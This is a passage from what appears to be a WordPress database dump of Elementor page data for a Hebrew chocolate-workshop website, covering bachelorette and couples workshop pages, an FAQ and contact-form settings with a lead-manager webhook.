\\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7eb3f731\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"aade027\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"724228ca\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"]},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5acecf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"3ce72ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"55c9916\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e9a451\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"e628903\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00f8f5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1585,326,'_elementor_version','0.4'),(1588,327,'_wp_page_template','elementor_header_footer'),(1589,327,'_elementor_edit_mode','builder'),(1590,327,'_elementor_template_type','post'),(1591,327,'_elementor_data','[{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c6b6e2f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4bb4f72e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"6ddff824\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df02b1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4b78ab22\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7eb3f731\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"aade027\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"724228ca\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34826&lm_key=8e0cfb811d714b40a0691df809a7a4d5\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5acecf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"3ce72ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"55c9916\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e9a451\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"e628903\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00f8f5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1592,327,'_elementor_version','0.4'),(1594,328,'_wp_page_template','elementor_header_footer'),(1595,328,'_elementor_edit_mode','builder'),(1596,328,'_elementor_data','[{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.526},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. 